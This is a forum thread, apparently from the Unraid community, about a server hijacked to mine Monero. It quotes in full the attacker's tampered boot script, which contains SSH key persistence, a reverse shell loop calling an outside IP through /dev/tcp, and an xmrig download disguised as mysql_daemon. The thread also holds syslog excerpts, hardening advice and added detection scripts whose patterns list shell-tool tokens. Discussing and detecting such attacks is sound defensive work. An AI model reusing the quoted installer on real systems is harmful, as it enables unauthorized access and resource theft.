100% CPU across all cores due to mysql_daemon - UPDATE: go file hacked to mine Crypto



Hi all,

 

Recently my server has been maxing out the CPU on all cores on boot. I've tried stopping all docker apps and arrays but the issue persists.

Running top in the terminal shows the process is mysql_daemon. Can I shut this process down or is it needed by the OS for something?

 

(Screenshot attached: Screenshot-2021-02-04-at-15-07-49.png)

(Screenshot attached: Screenshot-2021-02-04-at-15-11-37.png)

 

  • 1 month later...
On 2/5/2021 at 3:03 PM, trurl said:

And the few plugins you have I don't think use that so I don't know why it would still be running.

 

Just a follow-up on this. I checked my /boot/config/go file and found someone had edited it to mine XMR! Full file contents below:

#!/bin/bash
# Start the Management Utility
/usr/local/sbin/emhttp &
mkdir /root/.ssh
chmod 700 /root/.ssh
cp /boot/config/ssh/authorized_keys /root/.ssh/
chmod 600 /root/.ssh/authorized_keys
nohup /bin/bash -c "while true; do /bin/bash -i >& /dev/tcp/31.208.152.27/6>
cd /dev/shm
wget https://github.com/xmrig/xmrig/releases/download/v6.7.0/xmrig-6.7.0-li>
tar xzvf xmrig-6.7.0-linux-static-x64.tar.gz
cd xmrig-6.7.0/
mv xmrig /usr/bin/mysql_daemon
mkdir -p /etc/mysql/conf.d
echo '{
    "autosave": true,
    "background": true,
    "cpu": {
        "enabled": true,
        "max-threads-hint": 50
    },
    "max-cpu-usage": 25,
    "cpu-priority": 1,
    "opencl": false,
    "cuda": false,
    "pools": [
        {
            "url": "pool.minexmr.com:443",
            "user": "49mWMCJRxCpcCAVixaEEk5hapQGTVF775eTKqafNU9mCg7JegujvjB>
            "keepalive": true,
            "tls": true
        }
    ]
}' > /etc/mysql/conf.d/.config.json
/usr/bin/mysql_daemon -c /etc/mysql/conf.d/.config.json -B
rm -r /dev/shm/xmrig-6.7.0
rm -r /dev/shm/xmrig-6.7.0-linux-static-x64.tar.gz

 

Not sure how they got access to be able to do this but it's pretty worrying. I've removed the contents for now and changed passwords/ports etc.

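A check for this kind of tampering, as an added example that is not code from the thread or from Unraid: it assumes a clean /boot/config/go is exactly the three stock lines that open the file quoted above (shebang, comment, emhttp start) and reports anything else, tagging lines that carry tokens from the miner installer such as /dev/tcp, /dev/shm, wget or nohup.

```shell
#!/bin/bash
# audit_go_file.sh: report anything in the Unraid boot script that is not the
# stock content. Added example, not code from the thread or from Unraid.
# Assumption: a clean /boot/config/go is exactly the three lines that open the
# file quoted above (shebang, comment, "/usr/local/sbin/emhttp &").

# Tokens seen in the installer quoted above; any of them in a go file is a red flag.
SUSPICIOUS_RE='/dev/tcp/|/dev/shm|wget |curl |nohup |base64|authorized_keys|mysql_daemon|\.config\.json'

# audit_go_file FILE: exit 0 if FILE holds only the stock lines, else print each
# extra line (tagged [SUSPICIOUS] when it matches SUSPICIOUS_RE) and exit 1.
audit_go_file() {
    local file="$1" extra
    # Drop the three stock lines and blank lines; whatever remains was added later.
    extra=$(grep -v -x -e '#!/bin/bash' -e '# Start the Management Utility' \
                 -e '/usr/local/sbin/emhttp &' "$file" \
            | grep -v '^[[:space:]]*$' || true)
    if [ -z "$extra" ]; then
        echo "OK: $file contains only the stock lines"
        return 0
    fi
    echo "WARNING: $file has lines beyond the stock three:"
    printf '%s\n' "$extra" | while IFS= read -r line; do
        if printf '%s\n' "$line" | grep -q -E "$SUSPICIOUS_RE"; then
            echo "  [SUSPICIOUS] $line"
        else
            echo "  [extra]      $line"
        fi
    done
    return 1
}

# Usage: audit_go_file.sh /boot/config/go
if [ "$#" -gt 0 ]; then
    audit_go_file "$1"
fi
```

Anything you deliberately added to the go file (plugins sometimes do) will show up as [extra]; the point is that every line beyond the stock three should be one you recognise.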
13 hours ago, JackDewhurst said:

I've not enabled anything specific to expose it. All Unraid settings are default other than changing the root user password. Just added a few docker containers like plex and radarr

 

Are you sure you have not opened up any inbound ports on your router or put Unraid into the DMZ? Normally a router will block all inbound connections by default.

  • 2 weeks later...

@JackDewhurst

On 3/17/2021 at 8:26 AM, BRiT said:

This is why no one should set up their servers to be exposed to the internet.

 

Now that we are more attuned to these sorts of things lately, I went back and looked at the OP's diagnostics. Here are some excerpts from syslog:

Feb  4 10:38:38 Bruce-Willis sshd[1956]: Accepted none for adm from 109.236.89.61 port 10163 ssh2
Feb  4 10:38:38 Bruce-Willis sshd[1957]: Accepted none for adm from 51.77.66.36 port 21574 ssh2
Feb  4 10:38:38 Bruce-Willis sshd[2003]: Accepted none for adm from 89.39.105.84 port 12355 ssh2
Feb  4 10:38:38 Bruce-Willis sshd[2097]: Accepted none for adm from 190.2.144.45 port 44237 ssh2
Feb  4 10:38:43 Bruce-Willis sshd[2371]: Invalid user tech from 196.89.145.142 port 61652
Feb  4 10:38:47 Bruce-Willis sshd[2369]: Failed password for root from 192.42.116.28 port 57396 ssh2
Feb  4 10:38:54 Bruce-Willis sshd[5195]: Accepted none for adm from 194.88.107.164 port 8746 ssh2
Feb  4 10:38:58 Bruce-Willis sshd[4618]: Failed password for root from 77.247.181.163 port 17784 ssh2
Feb  4 10:39:10 Bruce-Willis sshd[6513]: Accepted none for adm from 178.128.95.213 port 60574 ssh2
Feb  4 10:39:10 Bruce-Willis sshd[6254]: Failed password for root from 91.192.103.34 port 38220 ssh2
Feb  4 10:39:28 Bruce-Willis sshd[6724]: Failed password for root from 185.220.102.242 port 15016 ssh2

 

https://www.abuseipdb.com/check/109.236.89.61    Netherlands

https://www.abuseipdb.com/check/51.77.66.36    Germany

https://www.abuseipdb.com/check/192.42.116.28    Netherlands

https://www.abuseipdb.com/check/77.247.181.163    Netherlands

https://www.abuseipdb.com/check/91.192.103.34    Switzerland

https://www.abuseipdb.com/check/185.220.102.242    Netherlands

 

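Turning the syslog excerpt into a check, as an added example that is not from the thread: the lines that matter are the "Accepted none for adm" ones, which mean sshd let the adm account in with the "none" authentication method, i.e. without any credential at all. The script assumes the standard sshd log format shown above; the sample lines are constructed with documentation-range addresses, not the OP's syslog.

```shell
#!/bin/bash
# sshd_audit.sh: summarise an sshd syslog excerpt. Added example, not code from
# the thread. "Accepted none" = login succeeded with the "none" auth method,
# which only happens for an account that needs no password; alarm on it.
# Constructed sample (192.0.2.0/24 documentation range), not the OP's log.
SAMPLE_LOG=$(cat <<'EOF'
Feb  4 10:38:38 host sshd[1956]: Accepted none for adm from 192.0.2.10 port 10163 ssh2
Feb  4 10:38:43 host sshd[2371]: Invalid user tech from 192.0.2.11 port 61652
Feb  4 10:38:47 host sshd[2369]: Failed password for root from 192.0.2.12 port 57396 ssh2
Feb  4 10:38:54 host sshd[5195]: Accepted none for adm from 192.0.2.13 port 8746 ssh2
Feb  4 10:38:58 host sshd[4618]: Failed password for root from 192.0.2.12 port 17784 ssh2
Feb  4 10:39:10 host sshd[6513]: Accepted password for root from 192.0.2.14 port 60574 ssh2
EOF
)

# weak_auth_logins: read log text on stdin, print "method user ip" for every
# successful login whose method is neither password nor publickey.
# Field layout: $6=Accepted $7=method $8=for $9=user $10=from $11=ip
weak_auth_logins() {
    awk '/sshd\[[0-9]+\]: Accepted / && $7 != "password" && $7 != "publickey" {
             print $7, $9, $11 }'
}

# failed_root_sources: read log text on stdin, print "count ip" for failed
# root password attempts, busiest source first.
failed_root_sources() {
    awk '/sshd\[[0-9]+\]: Failed password for root from / { c[$11]++ }
         END { for (ip in c) print c[ip], ip }' | sort -rn
}

# Usage: sshd_audit.sh /var/log/syslog
if [ "$#" -gt 0 ]; then
    echo "== logins with a weak auth method =="; weak_auth_logins < "$1"
    echo "== failed root logins by source =="; failed_root_sources < "$1"
fi
```

A single line in the first list is the finding; the failed-root counts are background noise that any internet-exposed sshd collects within minutes.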
9 hours ago, jakehaas said:

My home network has no ports forwarded from outside.

Unlikely for this to have happened. You've probably at least forwarded 32400 for Plex, but a shortcut people take when they don't understand how to forward a port is to simply place a server within a DMZ... Alternatively, one of your clients has been hijacked.

  • 2 weeks later...

Just did a reboot today for the first time in a few weeks, and when it booted up I had the same issue as above. Go file was set to mine crypto. Looked through my router ports that were open and the only one I had open that was out of the ordinary was I had 4433 pointing to 443 when I was trying to get the My Servers plugin to work as I had trouble with my Eeros mesh router.

My admin account password is very complex as well.

5 minutes ago, docbrown said:

Just did a reboot today for the first time in a few weeks, and when it booted up I had the same issue as above. Go file was set to mine crypto. Looked through my router ports that were open and the only one I had open that was out of the ordinary was I had 4433 pointing to 443 when I was trying to get the My Servers plugin to work as I had trouble with my Eeros mesh router.

My admin account password is very complex as well.

 

Sounds bad if you cannot track down where this is coming from. I would be worried that you have some other device on your local LAN (or your router) compromised and that is the way that someone is getting into your system.

 

The other issue is how are they getting to the flash drive to change it? Is the flash drive shared on the network so that it can be accessed from another machine/device? I would recommend it is not shared on the network unless needed, and definitely do not have it shared as a public share so anyone can change its content.

1 hour ago, docbrown said:


Hmm, yes I can access it on the network but it doesn't appear under the Shares tab in the Unraid UI.

 

Edit: Main tab - Flash durrr

Click on the flash drive on the Main tab

 

I've often thought to myself that it should also be listed under the Disk Shares part of the Shares tab as that is a more 'discoverable' location.

 
